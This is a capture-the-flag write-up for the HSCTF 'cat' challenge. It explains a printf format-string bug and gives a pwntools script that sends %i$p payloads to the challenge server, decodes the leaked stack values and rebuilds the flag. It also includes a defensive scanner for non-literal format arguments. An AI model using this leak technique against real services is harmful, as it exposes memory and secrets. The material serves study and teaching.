Cat

Description

pwn/cat (by hmmm) | 435 points

Cat is the true standard text editor.

nc cat.hsctf.com 1337

Downloads: chall, chall.c

Analysis

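The program opens flag.txt and reads its contents into a flag buffer. It then declares an input buffer and simply echoes the input back.

Vulnerability = printf(buffer); the input is passed to printf as the format string, so any format specifiers it contains are interpreted.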
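A defender-side check for the bug named in the Analysis, as an added example (not code from the challenge or from this writeup's author): a small Python scanner that flags printf-family calls whose format argument is not a string literal. The C sample is constructed from the description above rather than taken from chall.c, and the names call_args and find_format_bugs are hypothetical.

```python
import re

# Position of the format-string argument in each printf-family call.
FORMAT_ARG = {"printf": 0, "fprintf": 1, "dprintf": 1,
              "sprintf": 1, "snprintf": 2, "syslog": 1}
CALL = re.compile(r"\b(%s)\s*\(" % "|".join(FORMAT_ARG))

def call_args(src, i):
    """Split the argument list that starts at src[i] (just after '(')."""
    args, cur, depth, quote = [], "", 0, None
    while i < len(src):
        ch = src[i]
        if quote and ch == "\\":          # escaped char: keep both characters
            ch, i = src[i:i + 2], i + 1
        elif quote:
            quote = None if ch == quote else quote
        elif ch in "\"'":
            quote = ch
        elif ch == "(":
            depth += 1
        elif ch == ")":
            if depth == 0:                # end of this call
                break
            depth -= 1
        elif ch == "," and depth == 0:    # top-level argument separator
            args.append(cur.strip())
            cur, ch = "", ""
        cur += ch
        i += 1
    return args + [cur.strip()]

def find_format_bugs(src):
    """Return (line, function, argument) for every non-literal format string."""
    hits = []
    for m in CALL.finditer(src):
        args, pos = call_args(src, m.end()), FORMAT_ARG[m.group(1)]
        if pos < len(args) and not args[pos].startswith('"'):
            hits.append((src.count("\n", 0, m.start()) + 1, m.group(1), args[pos]))
    return hits

# Constructed sample modelled on the Analysis above; NOT the real chall.c.
SAMPLE = r'''char flag[64], buffer[64];
fgets(flag, sizeof flag, fopen("flag.txt", "r"));
printf(buffer);                      /* input is the format string */
printf("%s", buffer);                /* fix: input is only data */
fprintf(stderr, "read %zu bytes, ok\n", strlen(buffer));
'''

print(find_format_bugs(SAMPLE))  # [(3, 'printf', 'buffer')]
```

gcc and clang perform this check themselves with -Wformat -Wformat-security. The scanner works on text only, so calls that appear inside comments or string literals are reported too.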

Solution

I used the script from CryptoCat's writeup video, which fuzzes the (similar) program, decodes the values and builds the flag.

from pwn import *

context.log_level = 'info'

flag = ''

# Let's fuzz x values
for i in range(8, 20):
    try:
        # io = process('./chall', level='warn') # Local
        io = remote('cat.hsctf.com', 1337, level='warn') # Connect to server

        # Format the counter
        # e.g. %i$p will attempt to print [i]th pointer (or string/hex/char/int)
        io.sendline(f'%{i}$p'.encode())
        
        # Receive the response (the value printed by %p)
        result = io.recvline()

        # Ignore null values (close the connection before moving on)
        if b'nil' in result:
            io.close()
            continue
        
        print(f'{i}: {result}')
        try:
            # Decode, reverse endianness and print
            decoded = unhex(result.strip().decode()[2:])
            reversed_hex = decoded[::-1]
            print(str(reversed_hex))
            # Build up flag
            flag += reversed_hex.decode()
        except Exception:
            # Skip values that do not decode as text
            ...

        io.close()
    except EOFError:
        io.close()

# Print and close
info(flag)
